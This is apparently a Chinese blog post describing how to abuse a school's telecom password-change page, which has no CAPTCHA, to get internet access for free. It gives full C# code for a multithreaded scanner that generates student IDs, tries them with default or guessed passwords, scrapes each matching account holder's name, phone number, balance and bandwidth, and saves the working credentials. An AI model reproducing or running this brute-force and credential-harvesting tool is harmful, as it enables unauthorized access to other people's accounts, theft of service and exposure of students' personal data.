最近发现我们学校的电信上网改密码的页面很简单,没有验证码,于是我就很好奇,后来发现原来是我们学校的电信的那个改密码的页面有漏洞于是就可以通过扫描账号免费上网
原理就是对修改密码的页面进行POST请求
如果密码账号正确就返回200
下面是C#的网络操作类
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Collections.Generic;
using System.Text.RegularExpressions;
namespace scan
{
public class zzHttp
{
private const string sContentType = "application/x-www-form-urlencoded";
private const string sUserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
public static string Send(string data, string url)
{
return Send(Encoding.GetEncoding("UTF-8").GetBytes(data), url);
}
public static string Send(byte[] data, string url)
{
Stream responseStream;
HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;
if (request == null)
{
throw new ApplicationException(string.Format("Invalid url string: {0}", url));
}
// request.UserAgent = sUserAgent;
request.ContentType = sContentType;
request.Method = "POST";
request.ContentLength = data.Length;
Stream requestStream = request.GetRequestStream();
requestStream.Write(data, 0, data.Length);
requestStream.Close();
try
{
responseStream = request.GetResponse().GetResponseStream();
}
catch (Exception exception)
{
throw exception;
}
string str = string.Empty;
using (StreamReader reader = new StreamReader(responseStream, Encoding.GetEncoding("UTF-8")))
{
str = reader.ReadToEnd();
}
responseStream.Close();
return str;
}
#region 同步通过POST方式发送数据
/// <summary>
/// 通过POST方式发送数据
/// </summary>
/// <param name="Url">url</param>
/// <param name="postDataStr">Post数据</param>
/// <param name="cookie">Cookie容器</param>
/// <returns></returns>
public string SendDataByPost(string Url, string postDataStr, ref CookieContainer cookie)
{
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url);
if (cookie.Count == 0)
{
request.CookieContainer = new CookieContainer();
cookie = request.CookieContainer;
}
else
{
request.CookieContainer = cookie;
}
request.Method = "POST";
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = postDataStr.Length;
//request.Timeout = 1000;
//request.ReadWriteTimeout = 3000;
Stream myRequestStream = request.GetRequestStream();
StreamWriter myStreamWriter = new StreamWriter(myRequestStream, Encoding.GetEncoding("gb2312"));
myStreamWriter.Write(postDataStr);
myStreamWriter.Close();
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream myResponseStream = response.GetResponseStream();
StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding("gb2312"));
string retString = myStreamReader.ReadToEnd();
myStreamReader.Close();
myResponseStream.Close();
return retString;
}
#endregion
#region 同步通过GET方式发送数据
/// <summary>
/// 通过GET方式发送数据
/// </summary>
/// <param name="Url">url</param>
/// <param name="postDataStr">GET数据</param>
/// <param name="cookie">Cookie容器</param>
/// <returns></returns>
public string SendDataByGET(string Url, string postDataStr, ref CookieContainer cookie)
{
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url + (postDataStr == "" ? "" : "?") + postDataStr);
if (cookie.Count == 0)
{
request.CookieContainer = new CookieContainer();
cookie = request.CookieContainer;
}
else
{
request.CookieContainer = cookie;
}
request.Method = "GET";
request.ContentType = "text/html;charset=UTF-8";
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream myResponseStream = response.GetResponseStream();
StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding("utf-8"));
string retString = myStreamReader.ReadToEnd();
myStreamReader.Close();
myResponseStream.Close();
return retString;
}
#endregion
public string zzget(string Url,string getdata, string type)
{
try
{
System.Net.WebRequest wReq = System.Net.WebRequest.Create(Url + (getdata == "" ? "" : "?") + getdata);
// Get the response instance.
wReq.Method = "GET";
wReq.ContentType = "text/html;charset=UTF-8";
System.Net.WebResponse wResp = wReq.GetResponse();
System.IO.Stream respStream = wResp.GetResponseStream();
// Dim reader As StreamReader = New StreamReader(respStream)
using (System.IO.StreamReader reader = new System.IO.StreamReader(respStream, Encoding.GetEncoding(type)))
{
return reader.ReadToEnd();
}
}
catch (System.Exception ex)
{
//errorMsg = ex.Message;
}
return "";
}
///<summary>
///采用post发送请求
///</summary>
///<param name="URL">url地址</param>
///<param name="strPostdata">发送的数据</param>
///<returns></returns>
public string zzpost(string URL, IDictionary<string, Object> strPostdata, string strEncoding)
{
//IDictionary<string, Object> idc = new Dictionary<string, object>();
StringBuilder data = new StringBuilder();
foreach (KeyValuePair<string, Object> param in strPostdata)
{
data.Append(param.Key).Append("=");
data.Append(param.Value.ToString());
data.Append("&");
}
data.Remove(data.Length- 1,1);
Encoding encoding = Encoding.Default;
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(URL);
request.CookieContainer = new CookieContainer();//少了这句就不能登录
request.Method = "post";
request.Accept = "text/html, application/xhtml+xml, */*";
request.ContentType = "application/x-www-form-urlencoded";
byte[] buffer = encoding.GetBytes(data.ToString());
request.ContentLength = buffer.Length;
request.GetRequestStream().Write(buffer, 0, buffer.Length);
/*
request.ContentLength = data.Length;
Stream myRequestStream = request.GetRequestStream();
StreamWriter myStreamWriter = new StreamWriter(myRequestStream, Encoding.GetEncoding("gb2312"));
myStreamWriter.Write(data);
myStreamWriter.Close();
*/
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
using (StreamReader reader = new StreamReader(response.GetResponseStream(), System.Text.Encoding.GetEncoding(strEncoding)))
{
return reader.ReadToEnd();
}
}
/// <summary>
/// 清除文本中Html的标签
/// </summary>
/// <param name="Content"></param>
/// <returns></returns>
public static string ClearHtml(string Content)
{
Content = Zxj_ReplaceHtml("&#[^>]*;", "", Content);
Content = Zxj_ReplaceHtml("</?marquee[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?object[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?param[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?embed[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?table[^>]*>", "", Content);
Content = Zxj_ReplaceHtml(" ", "", Content);
Content = Zxj_ReplaceHtml("</?tr[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?th[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?p[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?a[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?img[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?tbody[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?li[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?span[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?div[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?th[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?td[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?script[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("(javascript|jscript|vbscript|vbs):", "", Content);
Content = Zxj_ReplaceHtml("on(mouse|exit|error|click|key)", "", Content);
Content = Zxj_ReplaceHtml("<\?xml[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("<\/?[a-z]+:[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?font[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?b[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?u[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?i[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?strong[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?strong[^>]*>", "", Content);
Content = Zxj_ReplaceHtml(" ", "", Content);
Regex r = new Regex(@"s+");
Content = r.Replace(Content, "");
Content.Trim();
string clearHtml = Content;
return clearHtml;
}
/// <summary>
/// 清除文本中的Html标签
/// </summary>
/// <param name="patrn">要替换的标签正则表达式</param>
/// <param name="strRep">替换为的内容</param>
/// <param name="content">要替换的内容</param>
/// <returns></returns>
private static string Zxj_ReplaceHtml(string patrn, string strRep, string content)
{
if (string.IsNullOrEmpty(content))
{
content = "";
}
Regex rgEx = new Regex(patrn, RegexOptions.IgnoreCase);
string strTxt = rgEx.Replace(content, strRep);
return strTxt;
}
}
}
然后对某个网址进行post请求
//开始扫描
public void scan()
{
bool flag = false;
object[] V= GetValue();
string no = V[0].ToString();
string userpass = V[1].ToString();
int cnum = int.Parse(V[2].ToString());
int snum = int.Parse(V[3].ToString());
if (userpass.Length <= 0)
flag = true;
zzHttp http = new zzHttp();
string url = "这儿填你需要的网址";
//统计线程数
ThreadPool.QueueUserWorkItem(new WaitCallback(CountProcess));
//检查线程是否结束
rhw = ThreadPool.RegisterWaitForSingleObject(new AutoResetEvent(false), this.CheckThreadPool, null, 1000, false);
int begin = int.Parse(beginclass.Text);
int end = int.Parse(endclass.Text);
for (int m = begin; m <= end; m++)//扫描不同年级
{
for (int j = 1; j <= cnum; j++)
{
string tmp = "";
if (j < 10)
tmp = m + no + "0" + j;
else
tmp = m + no + j;
for (int i = 1; i <= snum; i++)
{
string tempstuno = "";//构造出来的学号
if (i < 10)
tempstuno = tmp + "0" + i;
else
tempstuno = tmp + i;
AddAccountMessage( tempstuno + "<正在检查...>");
if (flag)
{
scanuser s = new scanuser(http, url, tempstuno, tempstuno, this);
// threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
else
{
scanuser s = new scanuser(http, url, tempstuno, userpass, this);
//threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
//threadReceive.Start();
}
}
}
}
下面是扫描类
//扫描类
class scanuser
{
public Form1 F = null;
zzHttp http;
string url;
string username;
string userpass;
//判断一个用户的用户名和密码是否正确的
public scanuser(zzHttp http, string url, string username, string userpass, Form1 F)
{
this.F = F;
this.http = http;
this.username = username;
this.userpass = userpass;
this.url = url;
}
//登录
public void login(Object stateInfo)
{
string postdata = String.Format("name={0}&password={1}", username, userpass);
CookieContainer cookie = new CookieContainer();
try
{
string ret = http.SendDataByPost(url, postdata, ref cookie);
if (ret.Contains("客户名称"))
{
ret = zzHttp.ClearHtml(ret);//去掉多余的html
//获取姓名
int pos = ret.LastIndexOf("客户名称");
string name = ret.Substring(pos + 5, 2);//两个字姓名
string tmp = ret.Substring(pos + 7, 1);//第三个字
if (tmp != "联")
name = name + tmp;
//获取手机号
pos = ret.LastIndexOf("联系电话");
string tel = ret.Substring(pos + 5, 11);
Regex regex = new Regex("^1\d{10}$");
if (!regex.IsMatch(tel))
tel = "无";
//获取预存款
pos = ret.LastIndexOf("预存款余额(RMB)");
string money = ret.Substring(pos + 11,5);
tmp = ret.Substring(pos+16,1);
if (tmp != "<")
money += tmp;
//获取带宽 先判断有没有备注
string width = "2M";
if (ret.Contains("独享"))
{
if (ret.Contains("4M"))
width = "4M";
else if (ret.Contains("6M"))
width = "6M";
else if (ret.Contains("8M"))
width = "8M";
else if (ret.Contains("12M"))
width = "12M";
}
if (ret.Contains("有效"))
{
//F.AddScanMessage("
");
F.Setcolor(Color.Green);
F.AddScanMessage(username + "<有效," + name + "," + tel + ",$=" + money + "," + width + ">");
write_txt(username,userpass,name,width);
}
else if (ret.Contains("停机"))
{
//F.AddScanMessage("
");
F.Setcolor(Color.Red);
F.AddScanMessage(username + "<停机,"+ name + "," + tel + ">");
}
}
}catch(Exception ex)
{
F.Setcolor(Color.Yellow);
F.AddScanMessage("网络故障..."+ex.Message);
}
}
}